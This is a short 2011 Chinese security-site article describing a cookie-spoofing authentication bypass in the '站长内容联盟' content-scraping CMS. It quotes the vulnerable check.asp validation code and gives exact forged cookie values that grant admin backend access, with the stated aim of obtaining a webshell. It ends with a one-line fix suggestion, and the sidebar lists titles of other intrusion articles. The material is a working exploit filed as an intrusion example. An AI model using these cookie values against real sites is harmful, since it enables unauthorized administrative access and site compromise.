首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
站长内容联盟后台Cookie欺骗漏洞利用
来源:vfocus.net 作者:yeweit6 发布时间:2011-04-18  

站长内容联盟是国内使用最广泛的一套小偷程序,但是其后台验证不严格,通过cookie欺骗,可以绕过验证直接进入后台,拿到webshell。网站内容联盟,想必大多数站长都是知道的,或许都加入过一个或多个联盟。或许有些新人不了解,这里还是简单介绍一下网站内容联盟的特点:

1、免费拥有独立频道,联盟主办方负责更新和维护,加盟站长坐享其成;

2、联盟网站一般都默认统一的模版,但站长可以设置网站头和尾;

3、站长拥有自己的广告位,可以自己设置,有的还有推广佣金提成;

4、加盟网站和主办方网站访问量互相促进,大大提高网站排名。

 

漏洞利用:

验证文件 check.asp中的漏洞代码如下:

dim CheckAdmin,CheckAdminAll,Administer,tempAdmin,tadmin,Flag,Purview,AdminName

if md5(request.cookies("rand")&request.cookies("AdminName")&request.cookies("adminid"))<>request.cookies("check") then

errmsg=errmsg+ "<BR>"+"<li>没有权限或登录超时,请按确定返回重新登录."

call Error_Msg(Errmsg) 

response.end

end if


cookie欺骗的漏洞很明显,只要rand+AdminName+adminid的md5密文与check匹配即可。


改cookie为check=802e5e662c4ebe86c497b15afe0b58fd; rand=1; AdminName=admin

修复:这样的系统建议用session验证,或者cookie验证时加上从数据库中读取的password。

作者: yeweit6


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·KesionCMS V7.0科汛内容网站管理
·入侵检测三级跳 解析跳板技术
·入侵 www.gongwuyuan.com.cn (
·浅谈跨域WEB攻击
·ACCESS导shell
·高级PHP手工注入
·mysql可多语句执行下不用单引号o
·渗透校内网——XSS过程详解
·XSS漏洞基本攻击代码
·XSS偷取密码Cookies通用脚本
·XSS(跨站)偷cookie的代码
·Xss获取管理员后台地址实战
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved